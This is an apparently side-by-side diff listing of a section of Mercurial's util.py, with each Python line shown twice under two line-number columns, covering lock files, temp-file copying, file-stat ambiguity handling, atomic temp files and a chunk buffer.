1718 if safehasattr(time, "perf_counter"):
1731 if safehasattr(time, "perf_counter"):
1719 timer = time.perf_counter
1732 timer = time.perf_counter
1720
1733
1721 def makelock(info, pathname):
1734 def makelock(info, pathname):
1722 """Create a lock file atomically if possible
1735 """Create a lock file atomically if possible
1723
1736
1724 This may leave a stale lock file if symlink isn't supported and signal
1737 This may leave a stale lock file if symlink isn't supported and signal
1725 interrupt is enabled.
1738 interrupt is enabled.
1726 """
1739 """
1727 try:
1740 try:
1728 return os.symlink(info, pathname)
1741 return os.symlink(info, pathname)
1729 except OSError as why:
1742 except OSError as why:
1730 if why.errno == errno.EEXIST:
1743 if why.errno == errno.EEXIST:
1731 raise
1744 raise
1732 except AttributeError: # no symlink in os
1745 except AttributeError: # no symlink in os
1733 pass
1746 pass
1734
1747
1735 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1748 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1736 ld = os.open(pathname, flags)
1749 ld = os.open(pathname, flags)
1737 os.write(ld, info)
1750 os.write(ld, info)
1738 os.close(ld)
1751 os.close(ld)
1739
1752
1740 def readlock(pathname):
1753 def readlock(pathname):
1741 try:
1754 try:
1742 return os.readlink(pathname)
1755 return os.readlink(pathname)
1743 except OSError as why:
1756 except OSError as why:
1744 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1757 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1745 raise
1758 raise
1746 except AttributeError: # no symlink in os
1759 except AttributeError: # no symlink in os
1747 pass
1760 pass
1748 fp = posixfile(pathname, 'rb')
1761 fp = posixfile(pathname, 'rb')
1749 r = fp.read()
1762 r = fp.read()
1750 fp.close()
1763 fp.close()
1751 return r
1764 return r
1752
1765
1753 def fstat(fp):
1766 def fstat(fp):
1754 '''stat file object that may not have fileno method.'''
1767 '''stat file object that may not have fileno method.'''
1755 try:
1768 try:
1756 return os.fstat(fp.fileno())
1769 return os.fstat(fp.fileno())
1757 except AttributeError:
1770 except AttributeError:
1758 return os.stat(fp.name)
1771 return os.stat(fp.name)
1759
1772
1760 # File system features
1773 # File system features
1761
1774
1762 def fscasesensitive(path):
1775 def fscasesensitive(path):
1763 """
1776 """
1764 Return true if the given path is on a case-sensitive filesystem
1777 Return true if the given path is on a case-sensitive filesystem
1765
1778
1766 Requires a path (like /foo/.hg) ending with a foldable final
1779 Requires a path (like /foo/.hg) ending with a foldable final
1767 directory component.
1780 directory component.
1768 """
1781 """
1769 s1 = os.lstat(path)
1782 s1 = os.lstat(path)
1770 d, b = os.path.split(path)
1783 d, b = os.path.split(path)
1771 b2 = b.upper()
1784 b2 = b.upper()
1772 if b == b2:
1785 if b == b2:
1773 b2 = b.lower()
1786 b2 = b.lower()
1774 if b == b2:
1787 if b == b2:
1775 return True # no evidence against case sensitivity
1788 return True # no evidence against case sensitivity
1776 p2 = os.path.join(d, b2)
1789 p2 = os.path.join(d, b2)
1777 try:
1790 try:
1778 s2 = os.lstat(p2)
1791 s2 = os.lstat(p2)
1779 if s2 == s1:
1792 if s2 == s1:
1780 return False
1793 return False
1781 return True
1794 return True
1782 except OSError:
1795 except OSError:
1783 return True
1796 return True
1784
1797
1785 try:
1798 try:
1786 import re2
1799 import re2
1787 _re2 = None
1800 _re2 = None
1788 except ImportError:
1801 except ImportError:
1789 _re2 = False
1802 _re2 = False
1790
1803
1791 class _re(object):
1804 class _re(object):
1792 def _checkre2(self):
1805 def _checkre2(self):
1793 global _re2
1806 global _re2
1794 try:
1807 try:
1795 # check if match works, see issue3964
1808 # check if match works, see issue3964
1796 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1809 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1797 except ImportError:
1810 except ImportError:
1798 _re2 = False
1811 _re2 = False
1799
1812
1800 def compile(self, pat, flags=0):
1813 def compile(self, pat, flags=0):
1801 '''Compile a regular expression, using re2 if possible
1814 '''Compile a regular expression, using re2 if possible
1802
1815
1803 For best performance, use only re2-compatible regexp features. The
1816 For best performance, use only re2-compatible regexp features. The
1804 only flags from the re module that are re2-compatible are
1817 only flags from the re module that are re2-compatible are
1805 IGNORECASE and MULTILINE.'''
1818 IGNORECASE and MULTILINE.'''
1806 if _re2 is None:
1819 if _re2 is None:
1807 self._checkre2()
1820 self._checkre2()
1808 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1821 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1809 if flags & remod.IGNORECASE:
1822 if flags & remod.IGNORECASE:
1810 pat = '(?i)' + pat
1823 pat = '(?i)' + pat
1811 if flags & remod.MULTILINE:
1824 if flags & remod.MULTILINE:
1812 pat = '(?m)' + pat
1825 pat = '(?m)' + pat
1813 try:
1826 try:
1814 return re2.compile(pat)
1827 return re2.compile(pat)
1815 except re2.error:
1828 except re2.error:
1816 pass
1829 pass
1817 return remod.compile(pat, flags)
1830 return remod.compile(pat, flags)
1818
1831
1819 @propertycache
1832 @propertycache
1820 def escape(self):
1833 def escape(self):
1821 '''Return the version of escape corresponding to self.compile.
1834 '''Return the version of escape corresponding to self.compile.
1822
1835
1823 This is imperfect because whether re2 or re is used for a particular
1836 This is imperfect because whether re2 or re is used for a particular
1824 function depends on the flags, etc, but it's the best we can do.
1837 function depends on the flags, etc, but it's the best we can do.
1825 '''
1838 '''
1826 global _re2
1839 global _re2
1827 if _re2 is None:
1840 if _re2 is None:
1828 self._checkre2()
1841 self._checkre2()
1829 if _re2:
1842 if _re2:
1830 return re2.escape
1843 return re2.escape
1831 else:
1844 else:
1832 return remod.escape
1845 return remod.escape
1833
1846
1834 re = _re()
1847 re = _re()
1835
1848
1836 _fspathcache = {}
1849 _fspathcache = {}
1837 def fspath(name, root):
1850 def fspath(name, root):
1838 '''Get name in the case stored in the filesystem
1851 '''Get name in the case stored in the filesystem
1839
1852
1840 The name should be relative to root, and be normcase-ed for efficiency.
1853 The name should be relative to root, and be normcase-ed for efficiency.
1841
1854
1842 Note that this function is unnecessary, and should not be
1855 Note that this function is unnecessary, and should not be
1843 called, for case-sensitive filesystems (simply because it's expensive).
1856 called, for case-sensitive filesystems (simply because it's expensive).
1844
1857
1845 The root should be normcase-ed, too.
1858 The root should be normcase-ed, too.
1846 '''
1859 '''
1847 def _makefspathcacheentry(dir):
1860 def _makefspathcacheentry(dir):
1848 return dict((normcase(n), n) for n in os.listdir(dir))
1861 return dict((normcase(n), n) for n in os.listdir(dir))
1849
1862
1850 seps = pycompat.ossep
1863 seps = pycompat.ossep
1851 if pycompat.osaltsep:
1864 if pycompat.osaltsep:
1852 seps = seps + pycompat.osaltsep
1865 seps = seps + pycompat.osaltsep
1853 # Protect backslashes. This gets silly very quickly.
1866 # Protect backslashes. This gets silly very quickly.
1854 seps.replace('\\','\\\\')
1867 seps.replace('\\','\\\\')
1855 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1868 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1856 dir = os.path.normpath(root)
1869 dir = os.path.normpath(root)
1857 result = []
1870 result = []
1858 for part, sep in pattern.findall(name):
1871 for part, sep in pattern.findall(name):
1859 if sep:
1872 if sep:
1860 result.append(sep)
1873 result.append(sep)
1861 continue
1874 continue
1862
1875
1863 if dir not in _fspathcache:
1876 if dir not in _fspathcache:
1864 _fspathcache[dir] = _makefspathcacheentry(dir)
1877 _fspathcache[dir] = _makefspathcacheentry(dir)
1865 contents = _fspathcache[dir]
1878 contents = _fspathcache[dir]
1866
1879
1867 found = contents.get(part)
1880 found = contents.get(part)
1868 if not found:
1881 if not found:
1869 # retry "once per directory" per "dirstate.walk" which
1882 # retry "once per directory" per "dirstate.walk" which
1870 # may take place for each patches of "hg qpush", for example
1883 # may take place for each patches of "hg qpush", for example
1871 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1884 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1872 found = contents.get(part)
1885 found = contents.get(part)
1873
1886
1874 result.append(found or part)
1887 result.append(found or part)
1875 dir = os.path.join(dir, part)
1888 dir = os.path.join(dir, part)
1876
1889
1877 return ''.join(result)
1890 return ''.join(result)
1878
1891
1879 def checknlink(testfile):
1892 def checknlink(testfile):
1880 '''check whether hardlink count reporting works properly'''
1893 '''check whether hardlink count reporting works properly'''
1881
1894
1882 # testfile may be open, so we need a separate file for checking to
1895 # testfile may be open, so we need a separate file for checking to
1883 # work around issue2543 (or testfile may get lost on Samba shares)
1896 # work around issue2543 (or testfile may get lost on Samba shares)
1884 f1, f2, fp = None, None, None
1897 f1, f2, fp = None, None, None
1885 try:
1898 try:
1886 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1899 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1887 suffix='1~', dir=os.path.dirname(testfile))
1900 suffix='1~', dir=os.path.dirname(testfile))
1888 os.close(fd)
1901 os.close(fd)
1889 f2 = '%s2~' % f1[:-2]
1902 f2 = '%s2~' % f1[:-2]
1890
1903
1891 oslink(f1, f2)
1904 oslink(f1, f2)
1892 # nlinks() may behave differently for files on Windows shares if
1905 # nlinks() may behave differently for files on Windows shares if
1893 # the file is open.
1906 # the file is open.
1894 fp = posixfile(f2)
1907 fp = posixfile(f2)
1895 return nlinks(f2) > 1
1908 return nlinks(f2) > 1
1896 except OSError:
1909 except OSError:
1897 return False
1910 return False
1898 finally:
1911 finally:
1899 if fp is not None:
1912 if fp is not None:
1900 fp.close()
1913 fp.close()
1901 for f in (f1, f2):
1914 for f in (f1, f2):
1902 try:
1915 try:
1903 if f is not None:
1916 if f is not None:
1904 os.unlink(f)
1917 os.unlink(f)
1905 except OSError:
1918 except OSError:
1906 pass
1919 pass
1907
1920
1908 def endswithsep(path):
1921 def endswithsep(path):
1909 '''Check path ends with os.sep or os.altsep.'''
1922 '''Check path ends with os.sep or os.altsep.'''
1910 return (path.endswith(pycompat.ossep)
1923 return (path.endswith(pycompat.ossep)
1911 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1924 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1912
1925
1913 def splitpath(path):
1926 def splitpath(path):
1914 '''Split path by os.sep.
1927 '''Split path by os.sep.
1915 Note that this function does not use os.altsep because this is
1928 Note that this function does not use os.altsep because this is
1916 an alternative of simple "xxx.split(os.sep)".
1929 an alternative of simple "xxx.split(os.sep)".
1917 It is recommended to use os.path.normpath() before using this
1930 It is recommended to use os.path.normpath() before using this
1918 function if need.'''
1931 function if need.'''
1919 return path.split(pycompat.ossep)
1932 return path.split(pycompat.ossep)
1920
1933
1921 def mktempcopy(name, emptyok=False, createmode=None):
1934 def mktempcopy(name, emptyok=False, createmode=None):
1922 """Create a temporary file with the same contents from name
1935 """Create a temporary file with the same contents from name
1923
1936
1924 The permission bits are copied from the original file.
1937 The permission bits are copied from the original file.
1925
1938
1926 If the temporary file is going to be truncated immediately, you
1939 If the temporary file is going to be truncated immediately, you
1927 can use emptyok=True as an optimization.
1940 can use emptyok=True as an optimization.
1928
1941
1929 Returns the name of the temporary file.
1942 Returns the name of the temporary file.
1930 """
1943 """
1931 d, fn = os.path.split(name)
1944 d, fn = os.path.split(name)
1932 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1945 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1933 os.close(fd)
1946 os.close(fd)
1934 # Temporary files are created with mode 0600, which is usually not
1947 # Temporary files are created with mode 0600, which is usually not
1935 # what we want. If the original file already exists, just copy
1948 # what we want. If the original file already exists, just copy
1936 # its mode. Otherwise, manually obey umask.
1949 # its mode. Otherwise, manually obey umask.
1937 copymode(name, temp, createmode)
1950 copymode(name, temp, createmode)
1938 if emptyok:
1951 if emptyok:
1939 return temp
1952 return temp
1940 try:
1953 try:
1941 try:
1954 try:
1942 ifp = posixfile(name, "rb")
1955 ifp = posixfile(name, "rb")
1943 except IOError as inst:
1956 except IOError as inst:
1944 if inst.errno == errno.ENOENT:
1957 if inst.errno == errno.ENOENT:
1945 return temp
1958 return temp
1946 if not getattr(inst, 'filename', None):
1959 if not getattr(inst, 'filename', None):
1947 inst.filename = name
1960 inst.filename = name
1948 raise
1961 raise
1949 ofp = posixfile(temp, "wb")
1962 ofp = posixfile(temp, "wb")
1950 for chunk in filechunkiter(ifp):
1963 for chunk in filechunkiter(ifp):
1951 ofp.write(chunk)
1964 ofp.write(chunk)
1952 ifp.close()
1965 ifp.close()
1953 ofp.close()
1966 ofp.close()
1954 except: # re-raises
1967 except: # re-raises
1955 try:
1968 try:
1956 os.unlink(temp)
1969 os.unlink(temp)
1957 except OSError:
1970 except OSError:
1958 pass
1971 pass
1959 raise
1972 raise
1960 return temp
1973 return temp
1961
1974
1962 class filestat(object):
1975 class filestat(object):
1963 """help to exactly detect change of a file
1976 """help to exactly detect change of a file
1964
1977
1965 'stat' attribute is result of 'os.stat()' if specified 'path'
1978 'stat' attribute is result of 'os.stat()' if specified 'path'
1966 exists. Otherwise, it is None. This can avoid preparative
1979 exists. Otherwise, it is None. This can avoid preparative
1967 'exists()' examination on client side of this class.
1980 'exists()' examination on client side of this class.
1968 """
1981 """
1969 def __init__(self, stat):
1982 def __init__(self, stat):
1970 self.stat = stat
1983 self.stat = stat
1971
1984
1972 @classmethod
1985 @classmethod
1973 def frompath(cls, path):
1986 def frompath(cls, path):
1974 try:
1987 try:
1975 stat = os.stat(path)
1988 stat = os.stat(path)
1976 except OSError as err:
1989 except OSError as err:
1977 if err.errno != errno.ENOENT:
1990 if err.errno != errno.ENOENT:
1978 raise
1991 raise
1979 stat = None
1992 stat = None
1980 return cls(stat)
1993 return cls(stat)
1981
1994
1982 @classmethod
1995 @classmethod
1983 def fromfp(cls, fp):
1996 def fromfp(cls, fp):
1984 stat = os.fstat(fp.fileno())
1997 stat = os.fstat(fp.fileno())
1985 return cls(stat)
1998 return cls(stat)
1986
1999
1987 __hash__ = object.__hash__
2000 __hash__ = object.__hash__
1988
2001
1989 def __eq__(self, old):
2002 def __eq__(self, old):
1990 try:
2003 try:
1991 # if ambiguity between stat of new and old file is
2004 # if ambiguity between stat of new and old file is
1992 # avoided, comparison of size, ctime and mtime is enough
2005 # avoided, comparison of size, ctime and mtime is enough
1993 # to exactly detect change of a file regardless of platform
2006 # to exactly detect change of a file regardless of platform
1994 return (self.stat.st_size == old.stat.st_size and
2007 return (self.stat.st_size == old.stat.st_size and
1995 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2008 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1996 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2009 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1997 except AttributeError:
2010 except AttributeError:
1998 pass
2011 pass
1999 try:
2012 try:
2000 return self.stat is None and old.stat is None
2013 return self.stat is None and old.stat is None
2001 except AttributeError:
2014 except AttributeError:
2002 return False
2015 return False
2003
2016
2004 def isambig(self, old):
2017 def isambig(self, old):
2005 """Examine whether new (= self) stat is ambiguous against old one
2018 """Examine whether new (= self) stat is ambiguous against old one
2006
2019
2007 "S[N]" below means stat of a file at N-th change:
2020 "S[N]" below means stat of a file at N-th change:
2008
2021
2009 - S[n-1].ctime < S[n].ctime: can detect change of a file
2022 - S[n-1].ctime < S[n].ctime: can detect change of a file
2010 - S[n-1].ctime == S[n].ctime
2023 - S[n-1].ctime == S[n].ctime
2011 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2024 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2012 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2025 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2013 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2026 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2014 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2027 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2015
2028
2016 Case (*2) above means that a file was changed twice or more at
2029 Case (*2) above means that a file was changed twice or more at
2017 same time in sec (= S[n-1].ctime), and comparison of timestamp
2030 same time in sec (= S[n-1].ctime), and comparison of timestamp
2018 is ambiguous.
2031 is ambiguous.
2019
2032
2020 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2033 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2021 timestamp is ambiguous".
2034 timestamp is ambiguous".
2022
2035
2023 But advancing mtime only in case (*2) doesn't work as
2036 But advancing mtime only in case (*2) doesn't work as
2024 expected, because naturally advanced S[n].mtime in case (*1)
2037 expected, because naturally advanced S[n].mtime in case (*1)
2025 might be equal to manually advanced S[n-1 or earlier].mtime.
2038 might be equal to manually advanced S[n-1 or earlier].mtime.
2026
2039
2027 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2040 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2028 treated as ambiguous regardless of mtime, to avoid overlooking
2041 treated as ambiguous regardless of mtime, to avoid overlooking
2029 by confliction between such mtime.
2042 by confliction between such mtime.
2030
2043
2031 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2044 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2032 S[n].mtime", even if size of a file isn't changed.
2045 S[n].mtime", even if size of a file isn't changed.
2033 """
2046 """
2034 try:
2047 try:
2035 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2048 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2036 except AttributeError:
2049 except AttributeError:
2037 return False
2050 return False
2038
2051
2039 def avoidambig(self, path, old):
2052 def avoidambig(self, path, old):
2040 """Change file stat of specified path to avoid ambiguity
2053 """Change file stat of specified path to avoid ambiguity
2041
2054
2042 'old' should be previous filestat of 'path'.
2055 'old' should be previous filestat of 'path'.
2043
2056
2044 This skips avoiding ambiguity, if a process doesn't have
2057 This skips avoiding ambiguity, if a process doesn't have
2045 appropriate privileges for 'path'. This returns False in this
2058 appropriate privileges for 'path'. This returns False in this
2046 case.
2059 case.
2047
2060
2048 Otherwise, this returns True, as "ambiguity is avoided".
2061 Otherwise, this returns True, as "ambiguity is avoided".
2049 """
2062 """
2050 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2063 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2051 try:
2064 try:
2052 os.utime(path, (advanced, advanced))
2065 os.utime(path, (advanced, advanced))
2053 except OSError as inst:
2066 except OSError as inst:
2054 if inst.errno == errno.EPERM:
2067 if inst.errno == errno.EPERM:
2055 # utime() on the file created by another user causes EPERM,
2068 # utime() on the file created by another user causes EPERM,
2056 # if a process doesn't have appropriate privileges
2069 # if a process doesn't have appropriate privileges
2057 return False
2070 return False
2058 raise
2071 raise
2059 return True
2072 return True
2060
2073
2061 def __ne__(self, other):
2074 def __ne__(self, other):
2062 return not self == other
2075 return not self == other
2063
2076
2064 class atomictempfile(object):
2077 class atomictempfile(object):
2065 '''writable file object that atomically updates a file
2078 '''writable file object that atomically updates a file
2066
2079
2067 All writes will go to a temporary copy of the original file. Call
2080 All writes will go to a temporary copy of the original file. Call
2068 close() when you are done writing, and atomictempfile will rename
2081 close() when you are done writing, and atomictempfile will rename
2069 the temporary copy to the original name, making the changes
2082 the temporary copy to the original name, making the changes
2070 visible. If the object is destroyed without being closed, all your
2083 visible. If the object is destroyed without being closed, all your
2071 writes are discarded.
2084 writes are discarded.
2072
2085
2073 checkambig argument of constructor is used with filestat, and is
2086 checkambig argument of constructor is used with filestat, and is
2074 useful only if target file is guarded by any lock (e.g. repo.lock
2087 useful only if target file is guarded by any lock (e.g. repo.lock
2075 or repo.wlock).
2088 or repo.wlock).
2076 '''
2089 '''
2077 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2090 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2078 self.__name = name # permanent name
2091 self.__name = name # permanent name
2079 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2092 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2080 createmode=createmode)
2093 createmode=createmode)
2081 self._fp = posixfile(self._tempname, mode)
2094 self._fp = posixfile(self._tempname, mode)
2082 self._checkambig = checkambig
2095 self._checkambig = checkambig
2083
2096
2084 # delegated methods
2097 # delegated methods
2085 self.read = self._fp.read
2098 self.read = self._fp.read
2086 self.write = self._fp.write
2099 self.write = self._fp.write
2087 self.seek = self._fp.seek
2100 self.seek = self._fp.seek
2088 self.tell = self._fp.tell
2101 self.tell = self._fp.tell
2089 self.fileno = self._fp.fileno
2102 self.fileno = self._fp.fileno
2090
2103
2091 def close(self):
2104 def close(self):
2092 if not self._fp.closed:
2105 if not self._fp.closed:
2093 self._fp.close()
2106 self._fp.close()
2094 filename = localpath(self.__name)
2107 filename = localpath(self.__name)
2095 oldstat = self._checkambig and filestat.frompath(filename)
2108 oldstat = self._checkambig and filestat.frompath(filename)
2096 if oldstat and oldstat.stat:
2109 if oldstat and oldstat.stat:
2097 rename(self._tempname, filename)
2110 rename(self._tempname, filename)
2098 newstat = filestat.frompath(filename)
2111 newstat = filestat.frompath(filename)
2099 if newstat.isambig(oldstat):
2112 if newstat.isambig(oldstat):
2100 # stat of changed file is ambiguous to original one
2113 # stat of changed file is ambiguous to original one
2101 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2114 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2102 os.utime(filename, (advanced, advanced))
2115 os.utime(filename, (advanced, advanced))
2103 else:
2116 else:
2104 rename(self._tempname, filename)
2117 rename(self._tempname, filename)
2105
2118
2106 def discard(self):
2119 def discard(self):
2107 if not self._fp.closed:
2120 if not self._fp.closed:
2108 try:
2121 try:
2109 os.unlink(self._tempname)
2122 os.unlink(self._tempname)
2110 except OSError:
2123 except OSError:
2111 pass
2124 pass
2112 self._fp.close()
2125 self._fp.close()
2113
2126
2114 def __del__(self):
2127 def __del__(self):
2115 if safehasattr(self, '_fp'): # constructor actually did something
2128 if safehasattr(self, '_fp'): # constructor actually did something
2116 self.discard()
2129 self.discard()
2117
2130
2118 def __enter__(self):
2131 def __enter__(self):
2119 return self
2132 return self
2120
2133
2121 def __exit__(self, exctype, excvalue, traceback):
2134 def __exit__(self, exctype, excvalue, traceback):
2122 if exctype is not None:
2135 if exctype is not None:
2123 self.discard()
2136 self.discard()
2124 else:
2137 else:
2125 self.close()
2138 self.close()
2126
2139
2127 def unlinkpath(f, ignoremissing=False):
2140 def unlinkpath(f, ignoremissing=False):
2128 """unlink and remove the directory if it is empty"""
2141 """unlink and remove the directory if it is empty"""
2129 if ignoremissing:
2142 if ignoremissing:
2130 tryunlink(f)
2143 tryunlink(f)
2131 else:
2144 else:
2132 unlink(f)
2145 unlink(f)
2133 # try removing directories that might now be empty
2146 # try removing directories that might now be empty
2134 try:
2147 try:
2135 removedirs(os.path.dirname(f))
2148 removedirs(os.path.dirname(f))
2136 except OSError:
2149 except OSError:
2137 pass
2150 pass
2138
2151
2139 def tryunlink(f):
2152 def tryunlink(f):
2140 """Attempt to remove a file, ignoring ENOENT errors."""
2153 """Attempt to remove a file, ignoring ENOENT errors."""
2141 try:
2154 try:
2142 unlink(f)
2155 unlink(f)
2143 except OSError as e:
2156 except OSError as e:
2144 if e.errno != errno.ENOENT:
2157 if e.errno != errno.ENOENT:
2145 raise
2158 raise
2146
2159
2147 def makedirs(name, mode=None, notindexed=False):
2160 def makedirs(name, mode=None, notindexed=False):
2148 """recursive directory creation with parent mode inheritance
2161 """recursive directory creation with parent mode inheritance
2149
2162
2150 Newly created directories are marked as "not to be indexed by
2163 Newly created directories are marked as "not to be indexed by
2151 the content indexing service", if ``notindexed`` is specified
2164 the content indexing service", if ``notindexed`` is specified
2152 for "write" mode access.
2165 for "write" mode access.
2153 """
2166 """
2154 try:
2167 try:
2155 makedir(name, notindexed)
2168 makedir(name, notindexed)
2156 except OSError as err:
2169 except OSError as err:
2157 if err.errno == errno.EEXIST:
2170 if err.errno == errno.EEXIST:
2158 return
2171 return
2159 if err.errno != errno.ENOENT or not name:
2172 if err.errno != errno.ENOENT or not name:
2160 raise
2173 raise
2161 parent = os.path.dirname(os.path.abspath(name))
2174 parent = os.path.dirname(os.path.abspath(name))
2162 if parent == name:
2175 if parent == name:
2163 raise
2176 raise
2164 makedirs(parent, mode, notindexed)
2177 makedirs(parent, mode, notindexed)
2165 try:
2178 try:
2166 makedir(name, notindexed)
2179 makedir(name, notindexed)
2167 except OSError as err:
2180 except OSError as err:
2168 # Catch EEXIST to handle races
2181 # Catch EEXIST to handle races
2169 if err.errno == errno.EEXIST:
2182 if err.errno == errno.EEXIST:
2170 return
2183 return
2171 raise
2184 raise
2172 if mode is not None:
2185 if mode is not None:
2173 os.chmod(name, mode)
2186 os.chmod(name, mode)
2174
2187
2175 def readfile(path):
2188 def readfile(path):
2176 with open(path, 'rb') as fp:
2189 with open(path, 'rb') as fp:
2177 return fp.read()
2190 return fp.read()
2178
2191
2179 def writefile(path, text):
2192 def writefile(path, text):
2180 with open(path, 'wb') as fp:
2193 with open(path, 'wb') as fp:
2181 fp.write(text)
2194 fp.write(text)
2182
2195
2183 def appendfile(path, text):
2196 def appendfile(path, text):
2184 with open(path, 'ab') as fp:
2197 with open(path, 'ab') as fp:
2185 fp.write(text)
2198 fp.write(text)
2186
2199
2187 class chunkbuffer(object):
2200 class chunkbuffer(object):
2188 """Allow arbitrary sized chunks of data to be efficiently read from an
2201 """Allow arbitrary sized chunks of data to be efficiently read from an
2189 iterator over chunks of arbitrary size."""
2202 iterator over chunks of arbitrary size."""
2190
2203
2191 def __init__(self, in_iter):
2204 def __init__(self, in_iter):
2192 """in_iter is the iterator that's iterating over the input chunks."""
2205 """in_iter is the iterator that's iterating over the input chunks."""
2193 def splitbig(chunks):
2206 def splitbig(chunks):
2194 for chunk in chunks:
2207 for chunk in chunks:
2195 if len(chunk) > 2**20:
2208 if len(chunk) > 2**20:
2196 pos = 0
2209 pos = 0
2197 while pos < len(chunk):
2210 while pos < len(chunk):
2198 end = pos + 2 ** 18
2211 end = pos + 2 ** 18
2199 yield chunk[pos:end]
2212 yield chunk[pos:end]
2200 pos = end
2213 pos = end
2201 else:
2214 else:
2202 yield chunk
2215 yield chunk
2203 self.iter = splitbig(in_iter)
2216 self.iter = splitbig(in_iter)
2204 self._queue = collections.deque()
2217 self._queue = collections.deque()
2205 self._chunkoffset = 0
2218 self._chunkoffset = 0
2206
2219
2207 def read(self, l=None):
2220 def read(self, l=None):
2208 """Read L bytes of data from the iterator of chunks of data.
2221 """Read L bytes of data from the iterator of chunks of data.
2209 Returns less than L bytes if the iterator runs dry.
2222 Returns less than L bytes if the iterator runs dry.
2210
2223
2211 If size parameter is omitted, read everything"""
2224 If size parameter is omitted, read everything"""
2212 if l is None:
2225 if l is None:
2213 return ''.join(self.iter)
2226 return ''.join(self.iter)
2214
2227
2215 left = l
2228 left = l
2216 buf = []
2229 buf = []
2217 queue = self._queue
2230 queue = self._queue
2218 while left > 0:
2231 while left > 0:
2219 # refill the queue
2232 # refill the queue
2220 if not queue:
2233 if not queue:
2221 target = 2**18
2234 target = 2**18
2222 for chunk in self.iter:
2235 for chunk in self.iter:
2223 queue.append(chunk)
2236 queue.append(chunk)
2224 target -= len(chunk)
2237 target -= len(chunk)
2225 if target <= 0:
2238 if target <= 0:
2226 break
2239 break
2227 if not queue:
2240 if not queue:
2228 break
2241 break
2229
2242
2230 # The easy way to do this would be to queue.popleft(), modify the
2243 # The easy way to do this would be to queue.popleft(), modify the
2231 # chunk (if necessary), then queue.appendleft(). However, for cases
2244 # chunk (if necessary), then queue.appendleft(). However, for cases
2232 # where we read partial chunk content, this incurs 2 dequeue
2245 # where we read partial chunk content, this incurs 2 dequeue
2233 # mutations and creates a new str for the remaining chunk in the
2246 # mutations and creates a new str for the remaining chunk in the
2234 # queue. Our code below avoids this overhead.
2247 # queue. Our code below avoids this overhead.
2235
2248
2236 chunk = queue[0]
2249 chunk = queue[0]
2237 chunkl = len(chunk)
2250 chunkl = len(chunk)
2238 offset = self._chunkoffset
2251 offset = self._chunkoffset
2239
2252
2240 # Use full chunk.
2253 # Use full chunk.
2241 if offset == 0 and left >= chunkl:
2254 if offset == 0 and left >= chunkl:
2242 left -= chunkl
2255 left -= chunkl
2243 queue.popleft()
2256 queue.popleft()
2244 buf.append(chunk)
2257 buf.append(chunk)
2245 # self._chunkoffset remains at 0.
2258 # self._chunkoffset remains at 0.
2246 continue
2259 continue
2247
2260
2248 chunkremaining = chunkl - offset
2261 chunkremaining = chunkl - offset
2249
2262
2250 # Use all of unconsumed part of chunk.
2263 # Use all of unconsumed part of chunk.
2251 if left >= chunkremaining:
2264 if left >= chunkremaining:
2252 left -= chunkremaining
2265 left -= chunkremaining
2253 queue.popleft()
2266 queue.popleft()
2254 # offset == 0 is enabled by block above, so this won't merely
2267 # offset == 0 is enabled by block above, so this won't merely
2255 # copy via ``chunk[0:]``.
2268 # copy via ``chunk[0:]``.
2256 buf.append(chunk[offset:])
2269 buf.append(chunk[offset:])
2257 self._chunkoffset = 0
2270 self._chunkoffset = 0
2258
2271
2259 # Partial chunk needed.
2272 # Partial chunk needed.
2260 else:
2273 else:
2261 buf.append(chunk[offset:offset + left])
2274 buf.append(chunk[offset:offset + left])
2262 self._chunkoffset += left
2275 self._chunkoffset += left
2263 left -= chunkremaining
2276 left -= chunkremaining
2264
2277
2265 return ''.join(buf)
2278 return ''.join(buf)
2266
2279
